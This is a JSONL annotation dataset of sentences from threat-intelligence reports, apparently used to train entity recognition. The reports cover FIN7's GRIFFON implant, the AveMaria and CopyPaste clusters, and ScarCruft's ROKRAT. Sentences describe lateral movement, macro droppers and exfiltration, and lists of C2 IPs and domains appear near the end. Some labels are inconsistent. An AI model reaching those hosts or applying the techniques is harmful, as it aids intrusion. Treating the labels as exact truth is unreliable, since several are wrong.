{"text": "Using host-based digital forensic analysis , CTU analysts observed the intruders using the native ‘ at.exe ’ Windows task scheduler tool to move laterally within the infrastructure .", "spans": {"Organization: CTU": [[45, 48]], "Indicator: at.exe": [[100, 106]], "System: Windows": [[109, 116]]}, "info": {"id": "aptner_train_002348", "source": "aptner_train"}}
{"text": "Many threat groups use lateral movement techniques , but this engagement allowed CTU analysts to not only further validate indicators of lateral movement , but also to look a bit closer at those indicators and expand the cluster of indicators surrounding the use of at.exe for lateral movement within the infrastructure .", "spans": {"Organization: CTU": [[81, 84]], "Indicator: at.exe": [[266, 272]]}, "info": {"id": "aptner_train_002349", "source": "aptner_train"}}
{"text": "Threat actors accessed the source host via the hcdLoader RAT .", "spans": {"Malware: hcdLoader": [[47, 56]]}, "info": {"id": "aptner_train_002350", "source": "aptner_train"}}
{"text": "The sole indicator on the source host that at.exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf ) that was created when the tool was executed .", "spans": {"Indicator: at.exe": [[43, 49]], "Indicator: C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf": [[98, 136]]}, "info": {"id": "aptner_train_002351", "source": "aptner_train"}}
{"text": "Beyond the file system metadata for the Prefetch file ( creation and last modification times ) and the last execution time within the file metadata , CTU analysts did not observe any indicators of value on the source host .", "spans": {"System: Prefetch": [[40, 48]], "Organization: CTU": [[150, 153]]}, "info": {"id": "aptner_train_002352", "source": "aptner_train"}}
{"text": "Two files are created for the task at approximately the same time : C:\\Windows\\System32\\Tasks\\At1 and C:\\Windows\\Tasks\\At1.job .", "spans": {"Indicator: C:\\Windows\\Tasks\\At1.job": [[102, 126]]}, "info": {"id": "aptner_train_002353", "source": "aptner_train"}}
{"text": "The first file is an Extensible Markup Language ( XML ) file that can be opened and viewed in a text editor .", "spans": {"System: Extensible Markup Language": [[21, 47]], "System: XML": [[50, 53]]}, "info": {"id": "aptner_train_002354", "source": "aptner_train"}}
{"text": "The second file follows a decodable binary format .", "spans": {}, "info": {"id": "aptner_train_002355", "source": "aptner_train"}}
{"text": "The operating system also creates a registry key within the software registry hive that is specifically associated with the creation of the scheduled task on the destination host : Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1 .", "spans": {"System: Microsoft\\Windows": [[181, 198]]}, "info": {"id": "aptner_train_002356", "source": "aptner_train"}}
{"text": "The Task Scheduler service names the tasks , so subsequent tasks are named At2 , At3 , and so on .", "spans": {}, "info": {"id": "aptner_train_002357", "source": "aptner_train"}}
{"text": "FIN7.5 : the infamous cybercrime rig FIN7 continues its activities .", "spans": {"Organization: FIN7.5": [[0, 6]], "Organization: FIN7": [[37, 41]]}, "info": {"id": "aptner_train_002358", "source": "aptner_train"}}
{"text": "On August 1, 2018 , the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig .", "spans": {"Organization: Department of Justice": [[27, 48]], "Organization: FIN7": [[132, 136]]}, "info": {"id": "aptner_train_002359", "source": "aptner_train"}}
{"text": "Interestingly , this threat actor created fake companies in order to hire remote pentesters , developers and interpreters to participate in their malicious business .", "spans": {}, "info": {"id": "aptner_train_002361", "source": "aptner_train"}}
{"text": "The main goal behind its malicious activities was to steal financial assets from companies , such as debit cards , or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts .", "spans": {}, "info": {"id": "aptner_train_002362", "source": "aptner_train"}}
{"text": "In 2018-2019 , researchers of Kaspersky Lab ’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures ( TTPs ) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests .", "spans": {"Organization: Kaspersky": [[30, 39]], "Organization: Global Research and Analysis Team": [[47, 80]], "Organization: FIN7": [[181, 185]]}, "info": {"id": "aptner_train_002363", "source": "aptner_train"}}
{"text": "Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target .", "spans": {"Organization: Kaspersky Lab": [[0, 13]], "Organization: FIN7": [[71, 75]]}, "info": {"id": "aptner_train_002366", "source": "aptner_train"}}
{"text": "The spear phishing campaigns were remarkably sophisticated from a social engineering perspective .", "spans": {}, "info": {"id": "aptner_train_002367", "source": "aptner_train"}}
{"text": "In various cases , the operators exchanged numerous messages with their victims for weeks before sending their malicious documents .", "spans": {}, "info": {"id": "aptner_train_002368", "source": "aptner_train"}}
{"text": "The emails were efficient social-engineering attempts that appealed to a vast number of human emotions ( fear , stress , anger , etc. ) to elicit a response from their victims .", "spans": {"System: emails": [[4, 10]]}, "info": {"id": "aptner_train_002369", "source": "aptner_train"}}
{"text": "One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases , leading us to think that more than 130 companies had been targeted by the end of 2018 .", "spans": {"System: email": [[106, 111]]}, "info": {"id": "aptner_train_002370", "source": "aptner_train"}}
{"text": "We have seen two types of documents sent to victims in these spear phishing campaigns .", "spans": {}, "info": {"id": "aptner_train_002371", "source": "aptner_train"}}
{"text": "The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim’s computer , and the availability and version number of Microsoft Word .", "spans": {"System: INCLUDEPICTURE": [[27, 41]], "Organization: Microsoft": [[53, 62], [168, 177]], "System: Word": [[63, 67], [178, 182]]}, "info": {"id": "aptner_train_002372", "source": "aptner_train"}}
{"text": "The second one , which in many cases is an Office document protected with a trivial password , such as “ 12345 ” , “ 1234 ” , etc. , uses macros to execute a GRIFFON implant on the target’s computer .", "spans": {"System: Office": [[43, 49]], "System: macros": [[138, 144]], "Malware: GRIFFON": [[158, 165]]}, "info": {"id": "aptner_train_002373", "source": "aptner_train"}}
{"text": "In various cases , the associated macro also scheduled tasks to make GRIFFON persistent .", "spans": {"System: macro": [[34, 39]], "Malware: GRIFFON": [[69, 76]]}, "info": {"id": "aptner_train_002374", "source": "aptner_train"}}
{"text": "The new builder inserts random values in the Author and Company metadata fields .", "spans": {}, "info": {"id": "aptner_train_002376", "source": "aptner_train"}}
{"text": "Moreover , the builder allows these to modify different IOCs , such as the filenames of wscript.exe or sctasks.exe copies , etc .", "spans": {"System: IOCs": [[56, 60]], "Indicator: wscript.exe": [[88, 99]], "Indicator: sctasks.exe": [[103, 114]]}, "info": {"id": "aptner_train_002377", "source": "aptner_train"}}
{"text": "The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism .", "spans": {"Malware: GRIFFON": [[4, 11]], "System: JScript": [[37, 44]]}, "info": {"id": "aptner_train_002378", "source": "aptner_train"}}
{"text": "The malware is designed for receiving modules to be executed in-memory and sending the results to C2s .", "spans": {}, "info": {"id": "aptner_train_002379", "source": "aptner_train"}}
{"text": "We were able to obtain four different modules during the investigation .", "spans": {}, "info": {"id": "aptner_train_002380", "source": "aptner_train"}}
{"text": "This module mainly relies on WMI and Windows objects to deliver results , which will be sent back to the operators .", "spans": {"System: WMI": [[29, 32]], "System: Windows": [[37, 44]]}, "info": {"id": "aptner_train_002382", "source": "aptner_train"}}
{"text": "Interestingly , more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage , from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors .", "spans": {"System: Windows": [[195, 202]]}, "info": {"id": "aptner_train_002383", "source": "aptner_train"}}
{"text": "The second module is used by the operators to execute an obfuscated PowerShell script , which contains a Meterpreter downloader widely known as “ Tinymet “ .", "spans": {"System: PowerShell": [[68, 78]], "System: Meterpreter": [[105, 116]], "System: downloader": [[117, 127]], "System: Tinymet": [[146, 153]]}, "info": {"id": "aptner_train_002384", "source": "aptner_train"}}
{"text": "This downloader , seen in past FIN7 campaigns , downloads a one-byte XOR encrypted ( eg. with the key equal to 0x50 or 0x51 ) piece of meterpreter shellcode to execute .", "spans": {"System: downloader": [[5, 15]], "Organization: FIN7": [[31, 35]], "System: meterpreter": [[135, 146]]}, "info": {"id": "aptner_train_002385", "source": "aptner_train"}}
{"text": "The third module allows the operators to take a screenshot of the remote system .", "spans": {}, "info": {"id": "aptner_train_002386", "source": "aptner_train"}}
{"text": "To do that , it also drops a PowerShell script on the workstation to execute .", "spans": {"System: PowerShell": [[29, 39]]}, "info": {"id": "aptner_train_002387", "source": "aptner_train"}}
{"text": "The script executes an open-source .NET class used for taking a screenshot .", "spans": {"Indicator: .NET": [[35, 39]]}, "info": {"id": "aptner_train_002388", "source": "aptner_train"}}
{"text": "The resulting screenshot is saved at “ %TMP%/image.png ” , sent back to the attackers by the GRIFFON implant and then deleted .", "spans": {"Indicator: %TMP%/image.png": [[39, 54]], "Malware: GRIFFON": [[93, 100]]}, "info": {"id": "aptner_train_002389", "source": "aptner_train"}}
{"text": "The last retrieved module is a persistence module .", "spans": {}, "info": {"id": "aptner_train_002390", "source": "aptner_train"}}
{"text": "If the victim appears valuable to the attackers , a GRIFFON implant installer is pushed to the victim’s workstation .", "spans": {"Malware: GRIFFON": [[52, 59]], "System: installer": [[68, 77]]}, "info": {"id": "aptner_train_002391", "source": "aptner_train"}}
{"text": "This module stores another instance of the GRIFFON implant inside the registry to achieve persistence .", "spans": {"Malware: GRIFFON": [[43, 50]]}, "info": {"id": "aptner_train_002392", "source": "aptner_train"}}
{"text": "Here is a PowerLinks style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon .", "spans": {"System: PowerLinks": [[10, 20]], "Malware: GRIFFON": [[95, 102]]}, "info": {"id": "aptner_train_002393", "source": "aptner_train"}}
{"text": "Through its light weight and modular architecture , the GRIFFON implant is the perfect validator .", "spans": {"Malware: GRIFFON": [[56, 63]]}, "info": {"id": "aptner_train_002395", "source": "aptner_train"}}
{"text": "Even though we have been able to retrieve four different modules , it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation .", "spans": {"Organization: FIN7": [[91, 95]]}, "info": {"id": "aptner_train_002396", "source": "aptner_train"}}
{"text": "Attackers make mistakes , and FIN7 are no exception .", "spans": {"Organization: FIN7": [[30, 34]]}, "info": {"id": "aptner_train_002397", "source": "aptner_train"}}
{"text": "The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year .", "spans": {"Malware: GRIFFON": [[97, 104]]}, "info": {"id": "aptner_train_002398", "source": "aptner_train"}}
{"text": "In order to trick blue teams and other DFIR analysts , the operators created fake HTTP 302 redirection to various Google services on their C2s servers .", "spans": {"System: DFIR": [[39, 43]], "Organization: Google": [[114, 120]]}, "info": {"id": "aptner_train_002399", "source": "aptner_train"}}
{"text": "This error allowed us to follow the infrastructure week by week , until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018 .", "spans": {"Organization: Twitter": [[96, 103]], "System: C2": [[133, 135]]}, "info": {"id": "aptner_train_002400", "source": "aptner_train"}}
{"text": "A few days after the tweet , in January 2019 , the operators changed their landing page in order to prevent this type of tracking against their infrastructure .", "spans": {}, "info": {"id": "aptner_train_002401", "source": "aptner_train"}}
{"text": "During the investigation related to the GRIFFON infrastructure , we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company .", "spans": {"Malware: GRIFFON": [[40, 47], [127, 134]], "System: WHOIS": [[104, 109]], "System: C2": [[135, 137]]}, "info": {"id": "aptner_train_002402", "source": "aptner_train"}}
{"text": "According to the website , that domain supposedly belongs to a legitimate security company “ fully owned by the Russian Government ” ( sic . ) and having offices in “ Moscow , Saint Petersburg and Yekaterinburg ” , but the address says the company is located in Trump Tower , in New York .", "spans": {"Organization: Russian Government": [[112, 130]], "Organization: Trump Tower": [[262, 273]]}, "info": {"id": "aptner_train_002403", "source": "aptner_train"}}
{"text": "Given FIN7 ’s previous use of false security companies , we decided to look deeper into this one .", "spans": {"Organization: FIN7": [[6, 10]]}, "info": {"id": "aptner_train_002404", "source": "aptner_train"}}
{"text": "As we were looking at the content of the website , it became evident that almost all of the text used was lifted from legitimate security-company websites .", "spans": {}, "info": {"id": "aptner_train_002405", "source": "aptner_train"}}
{"text": "Phrases and sentences were borrowed from at least the following companies/sites : DKSec – www.dksec.com , OKIOK – www.okiok.com/services/tailored-solutions , MainNerve – www.mainnerve.com , Datics – www.datatics.com/cyber-security , Perspective Risk – www.perspectiverisk.com , Synack – https://www.synack.com/company , FireEye – https://www.fireeye.com/services/penetration-testing.html .", "spans": {"Organization: DKSec": [[82, 87]], "Indicator: www.dksec.com": [[90, 103]], "Organization: OKIOK": [[106, 111]], "Indicator: www.okiok.com/services/tailored-solutions": [[114, 155]], "Organization: MainNerve": [[158, 167]], "Indicator: www.mainnerve.com": [[170, 187]], "Organization: Datics": [[190, 196]], "Indicator: www.datatics.com/cyber-security": [[199, 230]], "Organization: Perspective Risk": [[233, 249]], "Indicator: www.perspectiverisk.com": [[252, 275]], "Organization: Synack": [[278, 284]], "Indicator: https://www.synack.com/company": [[287, 317]], "Organization: FireEye": [[320, 327]], "Indicator: https://www.fireeye.com/services/penetration-testing.html": [[330, 387]]}, "info": {"id": "aptner_train_002406", "source": "aptner_train"}}
{"text": "This company seems to have been used by the FIN7 threat actor to hire new people as translators , developers and pentesters .", "spans": {"Organization: FIN7": [[44, 48]]}, "info": {"id": "aptner_train_002407", "source": "aptner_train"}}
{"text": "During our research , we found various job advertisements associated with the company on freelance and remote-work websites .", "spans": {}, "info": {"id": "aptner_train_002408", "source": "aptner_train"}}
{"text": "While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019 , we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set .", "spans": {"Organization: FIN7": [[197, 201]]}, "info": {"id": "aptner_train_002409", "source": "aptner_train"}}
{"text": "The link between these threat actors and FIN7 is still weak , but we decided to disclose a few hints regarding these in this blog post .", "spans": {"Organization: FIN7": [[41, 45]]}, "info": {"id": "aptner_train_002410", "source": "aptner_train"}}
{"text": "In his history , FIN7 has overlapped several times with Cobalt in terms of TTPs .", "spans": {"Organization: FIN7": [[17, 21]], "Malware: Cobalt": [[56, 62]]}, "info": {"id": "aptner_train_002411", "source": "aptner_train"}}
{"text": "After a successful penetration , it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access .", "spans": {"System: CobaltStrike": [[67, 79]], "System: Powershell": [[93, 103]], "System: Empire": [[104, 110]]}, "info": {"id": "aptner_train_002414", "source": "aptner_train"}}
{"text": "FIN7 ’s last campaigns were targeting banks in Europe and Central America .", "spans": {"Organization: FIN7": [[0, 4]]}, "info": {"id": "aptner_train_002415", "source": "aptner_train"}}
{"text": "A few interesting overlaps in recent FIN7 campaigns : Both used macros to copy wscript.exe to another file , which began with “ ms ” ( mses.exe – FIN7 , msutil.exe – EmpireMonkey ) .", "spans": {"Organization: FIN7": [[37, 41], [146, 150]], "System: macros": [[64, 70]], "Indicator: wscript.exe": [[79, 90]], "Indicator: mses.exe": [[135, 143]], "Indicator: msutil.exe": [[153, 163]], "Malware: EmpireMonkey": [[166, 178]]}, "info": {"id": "aptner_train_002417", "source": "aptner_train"}}
{"text": "Both executed a JScript file named “ error ” in %TEMP% ( Errors.txt in the case of FIN7 , Errors.bat for EmpireMonkey ) .", "spans": {"System: JScript": [[16, 23]], "Indicator: Errors.txt": [[57, 67]], "Organization: FIN7": [[83, 87]], "Indicator: Errors.bat": [[90, 100]], "Malware: EmpireMonkey": [[105, 117]]}, "info": {"id": "aptner_train_002418", "source": "aptner_train"}}
{"text": "Both used DocuSign decoy documents with different macros .", "spans": {"System: DocuSign": [[10, 18]], "System: macros": [[50, 56]]}, "info": {"id": "aptner_train_002419", "source": "aptner_train"}}
{"text": "The macros popped the same “ Document decryption error ” error message—even if macro code remain totally different .", "spans": {"System: macros": [[4, 10]], "System: macro": [[79, 84]]}, "info": {"id": "aptner_train_002420", "source": "aptner_train"}}
{"text": "We have a high level of confidence in a historic association between FIN7 and Cobalt , even though we believe that these two clusters of activity are operated by different teams .", "spans": {"Organization: FIN7": [[69, 73]], "Malware: Cobalt": [[78, 84]]}, "info": {"id": "aptner_train_002421", "source": "aptner_train"}}
{"text": "We have medium confidence that this botnet falls under the FIN7 umbrella .", "spans": {"Organization: FIN7": [[59, 63]]}, "info": {"id": "aptner_train_002423", "source": "aptner_train"}}
{"text": "Since the beginning of 2019 , we have collected more than 1300 samples and extracted more than 130 C2s .", "spans": {}, "info": {"id": "aptner_train_002425", "source": "aptner_train"}}
{"text": "What is interesting , in some emails , they ask targets to phone them if they have any questions , like the FIN7 guys do .", "spans": {"System: emails": [[30, 36]], "Organization: FIN7": [[108, 112]]}, "info": {"id": "aptner_train_002428", "source": "aptner_train"}}
{"text": "During the investigation into FIN7 , our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria .", "spans": {"Organization: FIN7": [[30, 34], [126, 130]], "Malware: AveMaria": [[135, 143]]}, "info": {"id": "aptner_train_002429", "source": "aptner_train"}}
{"text": "Basically , two servers in the same IP range and AS14576 ( autonomous system ) share a non-standard SSH port , which is 222 .", "spans": {}, "info": {"id": "aptner_train_002430", "source": "aptner_train"}}
{"text": "One of the servers is a Griffon C2, and the other one , an AveMaria C2 .", "spans": {"Malware: Griffon": [[24, 31]], "Malware: AveMaria": [[59, 67]], "System: C2": [[68, 70]]}, "info": {"id": "aptner_train_002431", "source": "aptner_train"}}
{"text": "Distribution of targets is another factor suggesting that these two malware families may be connected .", "spans": {}, "info": {"id": "aptner_train_002432", "source": "aptner_train"}}
{"text": "We analyzed AveMaria targets during February and March of 2019 .", "spans": {"Malware: AveMaria": [[12, 20]]}, "info": {"id": "aptner_train_002433", "source": "aptner_train"}}
{"text": "The spearphishing emails were sent to various kinds of businesses only and did not target individuals .", "spans": {"System: emails": [[18, 24]]}, "info": {"id": "aptner_train_002434", "source": "aptner_train"}}
{"text": "Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies .", "spans": {}, "info": {"id": "aptner_train_002435", "source": "aptner_train"}}
{"text": "We also spotted several typical FIN7 targets , such as retailers and hotels .", "spans": {"Organization: FIN7": [[32, 36]]}, "info": {"id": "aptner_train_002436", "source": "aptner_train"}}
{"text": "Most AveMaria targets ( 72% ) were in the EU .", "spans": {"Malware: AveMaria": [[5, 13]], "Organization: EU": [[42, 44]]}, "info": {"id": "aptner_train_002437", "source": "aptner_train"}}
{"text": "This set of activity relied on open-source tools , such as Powershell Empire , and well-documented red teaming techniques , in order to get a foothold within the victim’s networks and avoid detection .", "spans": {"System: Powershell": [[59, 69]], "System: Empire": [[70, 76]]}, "info": {"id": "aptner_train_002440", "source": "aptner_train"}}
{"text": "The links between CopyPaste and FIN7 are still very weak .", "spans": {"Organization: CopyPaste": [[18, 27]], "Organization: FIN7": [[32, 36]]}, "info": {"id": "aptner_train_002441", "source": "aptner_train"}}
{"text": "It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7 .", "spans": {"Organization: CopyPaste": [[24, 33]], "Organization: FIN7": [[118, 122]]}, "info": {"id": "aptner_train_002442", "source": "aptner_train"}}
{"text": "During 2018 , Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak cybercrime groups .", "spans": {"Organization: Europol": [[14, 21]], "Organization: DoJ": [[26, 29]], "Organization: FIN7": [[72, 76]], "Organization: Carbanak": [[81, 89]]}, "info": {"id": "aptner_train_002443", "source": "aptner_train"}}
{"text": "It was believed that the arrest of the group leader will have an impact on the group’s operations .", "spans": {}, "info": {"id": "aptner_train_002444", "source": "aptner_train"}}
{"text": "However , recent data seems to indicate that the attacks have continued without significant drawbacks .", "spans": {}, "info": {"id": "aptner_train_002445", "source": "aptner_train"}}
{"text": "One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella .", "spans": {"Organization: CobaltGoblin": [[12, 24]], "Organization: FIN7": [[29, 33]]}, "info": {"id": "aptner_train_002446", "source": "aptner_train"}}
{"text": "They rely on a Griffon JS backdoor and Cobalt , and in recent attacks , Powershell Empire .", "spans": {"Malware: Griffon": [[15, 22]], "System: JS": [[23, 25]], "Malware: Cobalt": [[39, 45]], "System: Powershell": [[72, 82]], "System: Empire": [[83, 89]]}, "info": {"id": "aptner_train_002449", "source": "aptner_train"}}
{"text": "The second one is CobaltGoblin , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers .", "spans": {"Organization: CobaltGoblin": [[18, 30]]}, "info": {"id": "aptner_train_002450", "source": "aptner_train"}}
{"text": "We link the AveMaria botnet to these two groups with medium confidence : AveMaria ’s targets are mostly suppliers for big companies , and the way AveMaria manages its infrastructure is very similar to FIN7 .", "spans": {"Malware: AveMaria": [[12, 20], [73, 81], [146, 154]], "Organization: FIN7": [[201, 205]]}, "info": {"id": "aptner_train_002451", "source": "aptner_train"}}
{"text": "The links between CopyPaste and FIN7 are still very weak .", "spans": {"Organization: CopyPaste": [[18, 27]], "Organization: FIN7": [[32, 36]]}, "info": {"id": "aptner_train_002453", "source": "aptner_train"}}
{"text": "It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7 .", "spans": {"Organization: FIN7": [[136, 140]]}, "info": {"id": "aptner_train_002454", "source": "aptner_train"}}
{"text": "All of the aforementioned groups greatly benefit from unpatched systems in corporate environments .", "spans": {}, "info": {"id": "aptner_train_002455", "source": "aptner_train"}}
{"text": "They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework .", "spans": {"Organization: MS": [[91, 93]], "System: Office": [[94, 100]]}, "info": {"id": "aptner_train_002456", "source": "aptner_train"}}
{"text": "So far , the groups have not used any zero-days .", "spans": {"Vulnerability: zero-days": [[38, 47]]}, "info": {"id": "aptner_train_002457", "source": "aptner_train"}}
{"text": "FIN7 phishing documents may seem basic , but when combined with their extensive social engineering and focused targeting , they are quite successful .", "spans": {"Organization: FIN7": [[0, 4]]}, "info": {"id": "aptner_train_002458", "source": "aptner_train"}}
{"text": "As with their previous fake company “ Combi Security ” , we are confident that they continue to create new personas for use in either targeting or recruiting under a “ new ” brand , “ IPC ” .", "spans": {"Organization: Combi Security": [[38, 52]], "Organization: IPC": [[184, 187]]}, "info": {"id": "aptner_train_002459", "source": "aptner_train"}}
{"text": "AveMaria : 185.61.138.249 tain.warzonedns.com noreply377.ddns.net 185.162.131.97 91.192.100.62 server.mtcc.me doddyfire.dyndns.org 212.8.240.116 168.167.45.162 toekie.ddns.net warmaha.warzonedns.com .", "spans": {"Malware: AveMaria": [[0, 8]], "Indicator: 185.61.138.249": [[11, 25]], "Indicator: tain.warzonedns.com": [[26, 45]], "Indicator: noreply377.ddns.net": [[46, 65]], "Indicator: 185.162.131.97": [[66, 80]], "Indicator: 91.192.100.62": [[81, 94]], "Indicator: server.mtcc.me": [[95, 109]], "Indicator: doddyfire.dyndns.org": [[110, 130]], "Indicator: 212.8.240.116": [[131, 144]], "Indicator: 168.167.45.162": [[145, 159]], "Indicator: toekie.ddns.net": [[160, 175]], "Indicator: warmaha.warzonedns.com": [[176, 198]]}, "info": {"id": "aptner_train_002460", "source": "aptner_train"}}
{"text": "CopyPaste : digi-cert.org somtelnetworks.com geotrusts.com secureclientupdate.com digicertweb.com sport-pesa.org itaxkenya.com businessdailyafrica.net infotrak-research.com nairobiwired.com k-24tv.com .", "spans": {"Organization: CopyPaste": [[0, 9]], "Indicator: digi-cert.org": [[12, 25]], "Indicator: somtelnetworks.com": [[26, 44]], "Indicator: geotrusts.com": [[45, 58]], "Indicator: secureclientupdate.com": [[59, 81]], "Indicator: digicertweb.com": [[82, 97]], "Indicator: sport-pesa.org": [[98, 112]], "Indicator: itaxkenya.com": [[113, 126]], "Indicator: businessdailyafrica.net": [[127, 150]], "Indicator: infotrak-research.com": [[151, 172]], "Indicator: nairobiwired.com": [[173, 189]], "Indicator: k-24tv.com": [[190, 200]]}, "info": {"id": "aptner_train_002461", "source": "aptner_train"}}
{"text": "FIN7 : hpservice-cdn.com realtek-cdn.com logitech-cdn.com pci-cdn.com appleservice-cdn.com servicebing-cdn.com .", "spans": {"Organization: FIN7": [[0, 4]], "Indicator: hpservice-cdn.com": [[7, 24]], "Indicator: realtek-cdn.com": [[25, 40]], "Indicator: logitech-cdn.com": [[41, 57]], "Indicator: pci-cdn.com": [[58, 69]], "Indicator: appleservice-cdn.com": [[70, 90]], "Indicator: servicebing-cdn.com": [[91, 110]]}, "info": {"id": "aptner_train_002462", "source": "aptner_train"}}
{"text": "ScarCruft continues to evolve, introduces Bluetooth harvester .", "spans": {"Organization: ScarCruft": [[0, 9]], "System: Bluetooth": [[42, 51]]}, "info": {"id": "aptner_train_002463", "source": "aptner_train"}}
{"text": "We recently discovered some interesting telemetry on this actor , and decided to dig deeper into ScarCruft ’s recent activity .", "spans": {"Organization: ScarCruft": [[97, 106]]}, "info": {"id": "aptner_train_002466", "source": "aptner_train"}}
{"text": "This shows that the actor is still very active and constantly trying to elaborate its attack tools .", "spans": {}, "info": {"id": "aptner_train_002467", "source": "aptner_train"}}
{"text": "Based on our telemetry , we can reassemble ScarCruft ’s binary infection procedure .", "spans": {"Organization: ScarCruft": [[43, 52]]}, "info": {"id": "aptner_train_002468", "source": "aptner_train"}}
{"text": "It used a multi-stage binary infection to update each module effectively and evade detection .", "spans": {}, "info": {"id": "aptner_train_002469", "source": "aptner_train"}}
{"text": "In addition , we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel .", "spans": {"Organization: DarkHotel": [[139, 148]]}, "info": {"id": "aptner_train_002470", "source": "aptner_train"}}
{"text": "As in Operation Daybreak , this actor performs sophisticated attacks using a zero-day exploit .", "spans": {"Malware: zero-day": [[77, 85]]}, "info": {"id": "aptner_train_002472", "source": "aptner_train"}}
{"text": "However , sometimes using public exploit code is quicker and more effective for malware authors .", "spans": {}, "info": {"id": "aptner_train_002473", "source": "aptner_train"}}
{"text": "We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign .", "spans": {}, "info": {"id": "aptner_train_002474", "source": "aptner_train"}}
{"text": "In order to deploy an implant for the final payload , ScarCruft uses a multi-stage binary infection scheme .", "spans": {"Organization: ScarCruft": [[54, 63]]}, "info": {"id": "aptner_train_002475", "source": "aptner_train"}}
{"text": "As a rule , the initial dropper is created by the infection procedure .", "spans": {}, "info": {"id": "aptner_train_002476", "source": "aptner_train"}}
{"text": "In order to evade network level detection , the downloader uses steganography .", "spans": {"System: downloader": [[48, 58]]}, "info": {"id": "aptner_train_002481", "source": "aptner_train"}}
{"text": "The downloaded payload is an image file , but it contains an appended malicious payload to be decrypted .", "spans": {}, "info": {"id": "aptner_train_002482", "source": "aptner_train"}}
{"text": "The final payload created by the aforementioned process is a well known backdoor , also known as ROKRAT by Cisco Talos .", "spans": {"Malware: ROKRAT": [[97, 103]], "Organization: Cisco Talos": [[107, 118]]}, "info": {"id": "aptner_train_002483", "source": "aptner_train"}}
{"text": "This cloud service-based backdoor contains many features .", "spans": {}, "info": {"id": "aptner_train_002484", "source": "aptner_train"}}
{"text": "One of its main functions is to steal information .", "spans": {}, "info": {"id": "aptner_train_002485", "source": "aptner_train"}}
{"text": "Upon execution , this malware creates 10 random directory paths and uses them for a specially designated purpose .", "spans": {}, "info": {"id": "aptner_train_002486", "source": "aptner_train"}}
{"text": "The malware creates 11 threads simultaneously : six threads are responsible for stealing information from the infected host , and five threads are for forwarding collected data to four cloud services ( Box , Dropbox , Pcloud and Yandex ) .", "spans": {"System: Box": [[202, 205]], "System: Dropbox": [[208, 215]], "System: Pcloud": [[218, 224]], "System: Yandex": [[229, 235]]}, "info": {"id": "aptner_train_002487", "source": "aptner_train"}}
{"text": "When uploading stolen data to a cloud service , it uses predefined directory path such as /english , /video or /scriptout .", "spans": {}, "info": {"id": "aptner_train_002488", "source": "aptner_train"}}
{"text": "The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {"Organization: ScarCruft": [[4, 13]]}, "info": {"id": "aptner_train_002489", "source": "aptner_train"}}
{"text": "This malware is responsible for stealing Bluetooth device information .", "spans": {"System: Bluetooth": [[41, 50]]}, "info": {"id": "aptner_train_002491", "source": "aptner_train"}}
{"text": "It is fetched by a downloader , and collects information directly from the infected host .", "spans": {}, "info": {"id": "aptner_train_002492", "source": "aptner_train"}}
{"text": "This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information .", "spans": {"System: Windows": [[18, 25]], "System: Bluetooth": [[26, 35], [74, 83]]}, "info": {"id": "aptner_train_002493", "source": "aptner_train"}}
{"text": "We have found several victims of this campaign , based on our telemetry – investment and trading companies in Vietnam and Russia .", "spans": {}, "info": {"id": "aptner_train_002494", "source": "aptner_train"}}
{"text": "We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past .", "spans": {}, "info": {"id": "aptner_train_002498", "source": "aptner_train"}}
{"text": "The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs .", "spans": {}, "info": {"id": "aptner_train_002499", "source": "aptner_train"}}
{"text": "ScarCruft infected this victim on September 21, 2018 .", "spans": {"Organization: ScarCruft": [[0, 9]]}, "info": {"id": "aptner_train_002500", "source": "aptner_train"}}
{"text": "GreezeBackdoor is a tool of the DarkHotel APT group , which we have previously written about .", "spans": {"Malware: GreezeBackdoor": [[0, 14]], "Organization: DarkHotel": [[32, 41]]}, "info": {"id": "aptner_train_002502", "source": "aptner_train"}}
{"text": "In addition , this victim was also attacked by the Konni malware on 03 April 2018 .", "spans": {"Malware: Konni": [[51, 56]]}, "info": {"id": "aptner_train_002503", "source": "aptner_train"}}
